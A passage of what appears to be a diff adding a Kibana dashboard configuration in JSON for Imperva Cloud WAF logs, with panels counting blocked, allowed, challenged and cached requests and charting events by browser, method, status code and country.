+ "index": "2eb63a33-d0ba-432f-bbdb-fd39c3b36993", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "imperva_cloud_waf.event" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "imperva_cloud_waf.event" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#6092C0", + "layerId": "ecfb37f1-2f60-4208-aeb7-0ae1b22579c1", + "layerType": "data", + "metricAccessor": "d8efdf0f-55db-4e33-bd77-2ff5e821bb77" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 9, + "i": "c759b864-1c05-4f5a-8a24-321a796e94c8", + "w": 7, + "x": 20, + "y": 0 + }, + "panelIndex": "c759b864-1c05-4f5a-8a24-321a796e94c8", + "title": "Total Requests [Logs Imperva Cloud WAF]", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-ecfb37f1-2f60-4208-aeb7-0ae1b22579c1", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "a34c0c84-35f7-485b-8aff-d9719375fa8e", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "ecfb37f1-2f60-4208-aeb7-0ae1b22579c1": { + "columnOrder": [ + "d8efdf0f-55db-4e33-bd77-2ff5e821bb77" + ], + "columns": { + "d8efdf0f-55db-4e33-bd77-2ff5e821bb77": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Blocked Requests", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "event.action" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { 
+ "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "a34c0c84-35f7-485b-8aff-d9719375fa8e", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "imperva_cloud_waf.event" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "imperva_cloud_waf.event" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "event.action : req-blocked-*" + }, + "visualization": { + "color": "#6092C0", + "layerId": "ecfb37f1-2f60-4208-aeb7-0ae1b22579c1", + "layerType": "data", + "metricAccessor": "d8efdf0f-55db-4e33-bd77-2ff5e821bb77" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 9, + "i": "69b4961d-b2e8-49aa-b57e-18089306b583", + "w": 7, + "x": 27, + "y": 0 + }, + "panelIndex": "69b4961d-b2e8-49aa-b57e-18089306b583", + "title": "Blocked Requests [Logs Imperva Cloud WAF]", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-ecfb37f1-2f60-4208-aeb7-0ae1b22579c1", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "0ff9081a-e1a6-4342-9a95-a9918fdbec33", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "ecfb37f1-2f60-4208-aeb7-0ae1b22579c1": { + "columnOrder": [ + "d8efdf0f-55db-4e33-bd77-2ff5e821bb77" + ], + "columns": { + "d8efdf0f-55db-4e33-bd77-2ff5e821bb77": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Allowed Requests", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "event.action" + } + }, + "incompleteColumns": {}, + 
"sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "0ff9081a-e1a6-4342-9a95-a9918fdbec33", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "imperva_cloud_waf.event" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "imperva_cloud_waf.event" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "event.action : \"req-passed\" " + }, + "visualization": { + "color": "#6092C0", + "layerId": "ecfb37f1-2f60-4208-aeb7-0ae1b22579c1", + "layerType": "data", + "metricAccessor": "d8efdf0f-55db-4e33-bd77-2ff5e821bb77" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 9, + "i": "a098b19a-9eeb-409e-8640-5067f86078c7", + "w": 7, + "x": 34, + "y": 0 + }, + "panelIndex": "a098b19a-9eeb-409e-8640-5067f86078c7", + "title": "Allowed Requests [Logs Imperva Cloud WAF]", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-ecfb37f1-2f60-4208-aeb7-0ae1b22579c1", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "53ec5e78-b51b-4288-870d-c159b172ed5a", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "ecfb37f1-2f60-4208-aeb7-0ae1b22579c1": { + "columnOrder": [ + "d8efdf0f-55db-4e33-bd77-2ff5e821bb77" + ], + "columns": { + "d8efdf0f-55db-4e33-bd77-2ff5e821bb77": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Bad Requests", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": 
"number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "event.action" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "53ec5e78-b51b-4288-870d-c159b172ed5a", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "imperva_cloud_waf.event" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "imperva_cloud_waf.event" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "event.action : req-bad-*" + }, + "visualization": { + "color": "#6092C0", + "layerId": "ecfb37f1-2f60-4208-aeb7-0ae1b22579c1", + "layerType": "data", + "metricAccessor": "d8efdf0f-55db-4e33-bd77-2ff5e821bb77" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 9, + "i": "2ce9ebd8-844a-46ad-8814-b6c022a53559", + "w": 7, + "x": 41, + "y": 0 + }, + "panelIndex": "2ce9ebd8-844a-46ad-8814-b6c022a53559", + "title": "Bad Requests [Logs Imperva Cloud WAF]", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-ecfb37f1-2f60-4208-aeb7-0ae1b22579c1", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "9fb6f4c0-fb84-4502-9d1b-4adea470522a", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "ecfb37f1-2f60-4208-aeb7-0ae1b22579c1": { + "columnOrder": [ + "d8efdf0f-55db-4e33-bd77-2ff5e821bb77" + ], + "columns": { + "d8efdf0f-55db-4e33-bd77-2ff5e821bb77": { + "customLabel": true, + "dataType": "number", + 
"isBucketed": false, + "label": "Challenged Requests", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "event.action" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "9fb6f4c0-fb84-4502-9d1b-4adea470522a", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "imperva_cloud_waf.event" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "imperva_cloud_waf.event" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "event.action : req-challenge-*" + }, + "visualization": { + "color": "#6092C0", + "layerId": "ecfb37f1-2f60-4208-aeb7-0ae1b22579c1", + "layerType": "data", + "metricAccessor": "d8efdf0f-55db-4e33-bd77-2ff5e821bb77" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 9, + "i": "486bf205-e29b-4c19-9f3f-4ff5eabb8b1e", + "w": 7, + "x": 20, + "y": 9 + }, + "panelIndex": "486bf205-e29b-4c19-9f3f-4ff5eabb8b1e", + "title": "Challenged Requests [Logs Imperva Cloud WAF]", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-ecfb37f1-2f60-4208-aeb7-0ae1b22579c1", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "eb938c68-c896-407a-ab56-2305f6b23b58", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "ecfb37f1-2f60-4208-aeb7-0ae1b22579c1": { + "columnOrder": [ + 
"d8efdf0f-55db-4e33-bd77-2ff5e821bb77" + ], + "columns": { + "d8efdf0f-55db-4e33-bd77-2ff5e821bb77": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Cached Requests", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "event.action" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "eb938c68-c896-407a-ab56-2305f6b23b58", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "imperva_cloud_waf.event" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "imperva_cloud_waf.event" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "event.action : req-cached-*" + }, + "visualization": { + "color": "#6092C0", + "layerId": "ecfb37f1-2f60-4208-aeb7-0ae1b22579c1", + "layerType": "data", + "metricAccessor": "d8efdf0f-55db-4e33-bd77-2ff5e821bb77" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 9, + "i": "ec9fc3cf-977e-4cde-bf7b-0f6ba27ae186", + "w": 7, + "x": 27, + "y": 9 + }, + "panelIndex": "ec9fc3cf-977e-4cde-bf7b-0f6ba27ae186", + "title": "Cached Requests [Logs Imperva Cloud WAF]", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-abd9e58c-abec-44f0-9d95-3768df9b8930", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "43a42766-7342-4885-b71a-519aafe116cc", + "type": "index-pattern" + } + ], + "state": { + 
"adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "abd9e58c-abec-44f0-9d95-3768df9b8930": { + "columnOrder": [ + "eed0424d-6de8-4527-a2d6-fd4bfe72ac10" + ], + "columns": { + "eed0424d-6de8-4527-a2d6-fd4bfe72ac10": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Unique IP Addresses", + "operationType": "unique_count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "source.ip" + } + }, + "incompleteColumns": {} + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "43a42766-7342-4885-b71a-519aafe116cc", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "imperva_cloud_waf.event" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "imperva_cloud_waf.event" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#6092C0", + "layerId": "abd9e58c-abec-44f0-9d95-3768df9b8930", + "layerType": "data", + "metricAccessor": "eed0424d-6de8-4527-a2d6-fd4bfe72ac10" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 9, + "i": "6d748ea7-1436-40ad-800c-8e0c636740ad", + "w": 7, + "x": 34, + "y": 9 + }, + "panelIndex": "6d748ea7-1436-40ad-800c-8e0c636740ad", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-abd9e58c-abec-44f0-9d95-3768df9b8930", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "528c259d-3bb8-4791-8a19-a37b6624b556", + 
"type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "abd9e58c-abec-44f0-9d95-3768df9b8930": { + "columnOrder": [ + "eed0424d-6de8-4527-a2d6-fd4bfe72ac10" + ], + "columns": { + "eed0424d-6de8-4527-a2d6-fd4bfe72ac10": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Unique Domains", + "operationType": "unique_count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "imperva_cloud_waf.event.extensions.source.service_name" + } + }, + "incompleteColumns": {} + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "528c259d-3bb8-4791-8a19-a37b6624b556", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "imperva_cloud_waf.event" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "imperva_cloud_waf.event" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#6092C0", + "layerId": "abd9e58c-abec-44f0-9d95-3768df9b8930", + "layerType": "data", + "metricAccessor": "eed0424d-6de8-4527-a2d6-fd4bfe72ac10" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 9, + "i": "5e840a5e-01ae-4a23-8893-f2f875b81c5c", + "w": 7, + "x": 41, + "y": 9 + }, + "panelIndex": "5e840a5e-01ae-4a23-8893-f2f875b81c5c", + "title": "", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-0e52361c-137e-4c14-8b62-af92a36c86ca", + 
"type": "index-pattern" + }, + { + "id": "logs-*", + "name": "5bfe5e3b-12af-45dd-82eb-1213ec1fb70d", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "0e52361c-137e-4c14-8b62-af92a36c86ca": { + "columnOrder": [ + "4b82af58-c3ef-443b-be31-0a06235598e8", + "e51f3f8f-f4ba-4562-a06d-335ac3ba79c1" + ], + "columns": { + "4b82af58-c3ef-443b-be31-0a06235598e8": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "e51f3f8f-f4ba-4562-a06d-335ac3ba79c1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "5bfe5e3b-12af-45dd-82eb-1213ec1fb70d", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "imperva_cloud_waf.event" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "imperva_cloud_waf.event" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "curveType": "LINEAR", + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + 
"layers": [ + { + "accessors": [ + "e51f3f8f-f4ba-4562-a06d-335ac3ba79c1" + ], + "layerId": "0e52361c-137e-4c14-8b62-af92a36c86ca", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "xAccessor": "4b82af58-c3ef-443b-be31-0a06235598e8" + } + ], + "legend": { + "isVisible": true, + "position": "right", + "showSingleSeries": false + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "97624fe6-c73f-4388-8c25-125eef8ff15e", + "w": 38, + "x": 10, + "y": 18 + }, + "panelIndex": "97624fe6-c73f-4388-8c25-125eef8ff15e", + "title": "Events Over Time [Logs Imperva Cloud WAF]", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-e4b8b120-7757-437d-83ad-3e49ee5ccaa8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "423722ed-ae37-4133-a7b7-305a907f8b96", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "e4b8b120-7757-437d-83ad-3e49ee5ccaa8": { + "columnOrder": [ + "0fc3d91c-9625-4c73-bd40-f847da073470", + "2b258188-ac41-424a-aefa-1a9f1fca9fa1" + ], + "columns": { + "0fc3d91c-9625-4c73-bd40-f847da073470": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Browser Type", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "2b258188-ac41-424a-aefa-1a9f1fca9fa1", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 
5 + }, + "scale": "ordinal", + "sourceField": "destination.process.name" + }, + "2b258188-ac41-424a-aefa-1a9f1fca9fa1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "423722ed-ae37-4133-a7b7-305a907f8b96", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "imperva_cloud_waf.event" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "imperva_cloud_waf.event" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "e4b8b120-7757-437d-83ad-3e49ee5ccaa8", + "layerType": "data", + "legendDisplay": "show", + "metrics": [ + "2b258188-ac41-424a-aefa-1a9f1fca9fa1" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "0fc3d91c-9625-4c73-bd40-f847da073470" + ], + "truncateLegend": false + } + ], + "shape": "pie" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "121ba06e-38ec-4a78-8cc8-d5e592a2362c", + "w": 24, + "x": 0, + "y": 33 + }, + "panelIndex": "121ba06e-38ec-4a78-8cc8-d5e592a2362c", + "title": "Events by Browser Type [Logs Imperva Cloud WAF]", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": 
"indexpattern-datasource-layer-e4b8b120-7757-437d-83ad-3e49ee5ccaa8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "3bff65e1-141b-4e3e-8a07-16b93d6abb53", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "e4b8b120-7757-437d-83ad-3e49ee5ccaa8": { + "columnOrder": [ + "0fc3d91c-9625-4c73-bd40-f847da073470", + "2b258188-ac41-424a-aefa-1a9f1fca9fa1" + ], + "columns": { + "0fc3d91c-9625-4c73-bd40-f847da073470": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Request Type", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "2b258188-ac41-424a-aefa-1a9f1fca9fa1", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 5 + }, + "scale": "ordinal", + "sourceField": "http.request.method" + }, + "2b258188-ac41-424a-aefa-1a9f1fca9fa1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "3bff65e1-141b-4e3e-8a07-16b93d6abb53", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "imperva_cloud_waf.event" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "imperva_cloud_waf.event" + } + } + } + ], + "internalReferences": [], + "query": { + 
"language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "e4b8b120-7757-437d-83ad-3e49ee5ccaa8", + "layerType": "data", + "legendDisplay": "show", + "metrics": [ + "2b258188-ac41-424a-aefa-1a9f1fca9fa1" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "0fc3d91c-9625-4c73-bd40-f847da073470" + ], + "truncateLegend": false + } + ], + "shape": "pie" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "ecd8148f-256e-4fb0-998c-7c5f8ee0f836", + "w": 24, + "x": 24, + "y": 33 + }, + "panelIndex": "ecd8148f-256e-4fb0-998c-7c5f8ee0f836", + "title": "Events by Request Type [Logs Imperva Cloud WAF]", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-e4b8b120-7757-437d-83ad-3e49ee5ccaa8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "8aa8e1de-41cc-47b8-b258-68aca05b397e", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "e4b8b120-7757-437d-83ad-3e49ee5ccaa8": { + "columnOrder": [ + "0fc3d91c-9625-4c73-bd40-f847da073470", + "2b258188-ac41-424a-aefa-1a9f1fca9fa1" + ], + "columns": { + "0fc3d91c-9625-4c73-bd40-f847da073470": { + "customLabel": true, + "dataType": "number", + "isBucketed": true, + "label": "HTTP Status Code", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "2b258188-ac41-424a-aefa-1a9f1fca9fa1", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 5 + }, + "scale": "ordinal", + 
"sourceField": "http.response.status_code" + }, + "2b258188-ac41-424a-aefa-1a9f1fca9fa1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "8aa8e1de-41cc-47b8-b258-68aca05b397e", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "imperva_cloud_waf.event" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "imperva_cloud_waf.event" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "e4b8b120-7757-437d-83ad-3e49ee5ccaa8", + "layerType": "data", + "legendDisplay": "show", + "metrics": [ + "2b258188-ac41-424a-aefa-1a9f1fca9fa1" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "0fc3d91c-9625-4c73-bd40-f847da073470" + ], + "truncateLegend": false + } + ], + "shape": "pie" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "b5bdb40e-2ce5-4e7f-8bdd-ed0e6ac46a8e", + "w": 24, + "x": 0, + "y": 48 + }, + "panelIndex": "b5bdb40e-2ce5-4e7f-8bdd-ed0e6ac46a8e", + "title": "Events by HTTP Status Code [Logs Imperva Cloud WAF]", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": 
"indexpattern-datasource-layer-ef914720-960e-4e8e-ba49-d46dba28d267", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "47dffbaa-cffc-4216-8119-6a7a56cadffd", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "ef914720-960e-4e8e-ba49-d46dba28d267": { + "columnOrder": [ + "327ed0b3-b769-455a-a89a-81b6e85e307c", + "b934ef88-7fe9-4c40-b1a8-55033190e8ee" + ], + "columns": { + "327ed0b3-b769-455a-a89a-81b6e85e307c": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Country Code", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "b934ef88-7fe9-4c40-b1a8-55033190e8ee", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "source.geo.country_iso_code" + }, + "b934ef88-7fe9-4c40-b1a8-55033190e8ee": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "47dffbaa-cffc-4216-8119-6a7a56cadffd", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "imperva_cloud_waf.event" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "imperva_cloud_waf.event" + } + } + } + ], + 